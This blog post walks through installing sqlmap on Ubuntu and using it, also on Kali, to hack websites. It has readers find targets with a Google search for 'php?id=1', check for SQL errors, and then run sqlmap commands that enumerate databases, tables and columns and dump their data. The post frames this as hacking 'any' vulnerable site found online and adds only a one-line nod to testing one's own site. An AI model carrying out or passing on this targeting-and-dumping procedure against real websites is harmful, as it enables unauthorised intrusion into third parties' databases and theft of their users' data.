In this post i am going to talk about the penetration testing using one of the KALI linux tool called SQLMAP.

What is SQLMAP?

It is a open source tool to use sql injuction in better and simpler way.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
— sqlmap.org

It is pre installed on KALI LINUX Operating System.
But here i’ll tell you how to install this tool in your ubuntu machine and run test to hack the database of any sql injection vulnerable websites.



First download SQLMAP in your machine by using below command.

 wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz

This command will download latest sqlmap package from github into your current directory.
sqlmap-1

Now run this command to extract your sqlmap package from tar file.

tar -xvf sqlmap.tar.gz

If all done successfully go to to your sqlmap directory and run below command to test sqlmap in ubuntu.

cd sqlmapproject-sqlmap-c4f9e66/
python sqlmap.py --version

sqlmap-2

Now Let’s Hack begin.

You can find may sql injection vulnerable websites through google search by passing bellow query
open www.google.com and type php?id=1

Next from search result open website which url something like that..

http://www.example.com/about.php?id=1

Now check url is venerable or not by adding and hit enter if page gives sql error means You are lucky, Given url is ready for hack.

http://www.example.com/about.php?id=1'





Go to your sqlmap directory and Run this command to test sql injunction.
Where
-u :- means url we are going to hack
–dbs :- command will show hack-able list of database.

UBUNTU

 ./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs

sqlmap-3

KALI LINUX

Open terminal and run below command no need to install sqlmap in KALI LINUX

 sqlmap -u http://www.example.com/about.php?id=1 --dbs

In below image you can see the hacked database
sqlmap-4

Now hack the tables of hacked database.
Where
-D :- means database name you are going to hack
–tables :- command will show all the tables of hacked database.

UBUNTU

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables

sqlmap-5

KALI LINUX

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables

You can see the table list of hacked database.
sqlmap-6

Next task is fetch the column of any table.
Where
-T :- means Table name you are going to hack
–columns :- command will show all the columns of table.

UBUNTU

 ./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns

sqlmap-7

KALI LINUX

 sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns

Below you can see the list of columns of the hacked table.
sqlmap-8

Now this is your final task fetch real data from tables.
Where
-C :- means Column name of the table.
–dump :- command will show all data of given columns.

UBUNTU

./sqlmap.py -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump

KALI LINUX

sqlmap -u http://www.example.com/about.php?id=1 --dbs -D exampledb --tables -T apllied_items --columns -C menuid --dump

Above command will show the data of particular column, You can use this trick to hack website database which are less secure and must use this testing on your own website to test your website is secure or not.

If you like this post please don’t forget to subscribe My Public Notebook for more useful stuff.

Enter your email address to subscribe my public notebook..!!

Join 11,352 other subscribers